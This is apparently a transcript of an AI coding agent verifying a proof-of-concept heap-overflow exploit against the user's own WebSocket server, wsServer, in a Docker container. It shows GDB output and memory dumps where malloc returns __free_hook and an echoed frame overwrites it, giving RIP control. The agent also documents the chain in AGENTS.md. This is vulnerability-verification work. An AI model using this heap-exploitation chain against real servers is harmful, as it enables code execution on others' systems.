Re-run auto-mode test (fixed GDB breakpoint display)
Capture clean GDB output proving RIP control
Update AGENTS.md with full exploitation details
Longer term: convert PoC into regression test
Step

Let me check the current state of the key files before re-running.

Step

Good, the files look correct. The key change I noted was already applied — the response malloc breakpoint at lines 89-95 doesn't use the silent command, so its output will be printed. Let me re-run the auto-mode test now.

Run auto-mode PoC test
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
Step

The client ran but the GDB output wasn't captured. Let me fetch the container logs.

Fetch GDB output from container
$ docker logs ws-poc-server 2>&1 | tail -120
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
Step

The breakpoint display anomaly persists — buf = (nil) and __free_hook = (nil). This is because in GDB batch mode with continue inside breakpoint commands, the buf variable is out of scope when it's printed (it's declared later in the block). Let me verify the actual exploit chain and add a more reliable breakpoint.

The key proof is already here: the crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) is definitive. But let me fix the breakpoint to get clean buf output too.

The issue: in ws_sendframe_internal, buf is declared mid-function. At line 636, the variable hasn't been assigned yet. I need to break after the malloc returns. Let me check what line the return is on.

Step

The problem is clear: breaking at line 636 prints buf before the malloc call happens. I need to break at line 640 (after malloc returns). But the variable is response, not buf. Let me also look at line 687 for the free(response) call — that's where the crash should happen.
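Sketched in the document's GDB-script style, the corrected breakpoints would look roughly like this (line numbers 640 and 687 and the variable name response come from the discussion above and would need checking against src/ws.c):

```gdb
# After malloc returns: 'response' is now assigned.
break ws.c:640
commands
  silent
  printf "response = %p\n", response
  continue
end

# At free(response): dump the (possibly corrupted) __free_hook.
break ws.c:687
commands
  silent
  printf "free(response=%p), __free_hook = %p\n", response, (void *)__free_hook
  continue
end
```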

Let me update the GDB script to break at the right location and use the correct variable name response:

Edit /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
Step

I also need to fix the first malloc(msg) breakpoint — it's labeled "CONN 2" but triggers for conn 1 too — and the free(msg_data) breakpoint shows the wrong memory: after the overflow it should show the corrupted data at c1, so the free path deserves a closer look. The key issue, though, was buf vs response, so let me also confirm that response is actually __free_hook at the crash. Re-running:

Re-run auto-mode PoC test
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
Step
Fetch GDB output from container
$ docker logs ws-poc-server 2>&1 | tail -80
=== VULN: *frame_size += fsd->frame_length ===
  *frame_size   = 0
  frame_length  = 16 (0x10)

=== POST REALLOC ===
  msg (tmp) = 0x40c2b0
  realloc size = 16
0x40c2a0:	0x0000000000000000	0x0000000000000021
0x40c2b0:	0x000000000040c2d0	0x0000000000000000
Step

Clean, definitive proof captured. The exploit chain is fully verified:

  1. response = 0x7ffff7f9de48 — malloc returned __free_hook's address
  2. __free_hook = 0x4242424242420882 — the echo frame was written to __free_hook:
    • 0x0882 = WebSocket response header (opcode 2 binary FIN + length 8)
    • 0x42424242424242 = the echoed "BBBBBBBB" payload
  3. SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — free() called the corrupted __free_hook → RIP control
Step

Now let me update AGENTS.md with the full exploitation details:

Step
Edit /home/lucas/Works/VibeCodedProjects/wsServer/AGENTS.md
Edit applied successfully.
Step
Step

All immediate tasks are done. Here's what was accomplished this round:

  1. Fixed GDB breakpoint — changed from line 636 (before malloc) to line 640 (after malloc), and used the correct variable name response instead of buf. Added a breakpoint at free(response) (line 687) to capture the corrupted __free_hook value.

  2. Captured clean, definitive proof of the full exploit chain:

    • response = 0x7ffff7f9de48 — malloc returned __free_hook
    • __free_hook = 0x4242424242420882 — echo frame corrupted it (header 0x0882 + payload 0x42424242424242)
    • SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — RIP control achieved
  3. Updated AGENTS.md with the full PoC documentation section.

The remaining item is converting this into a proper regression test (lower priority). Want me to tackle that, or is this a good stopping point?

This is a good stopping point. Great job!
Step

Thanks! The PoC is complete and verified — clean RIP control with full GDB documentation. Reach out whenever you want to pick up the regression test.

15/04/2026, 19:37:15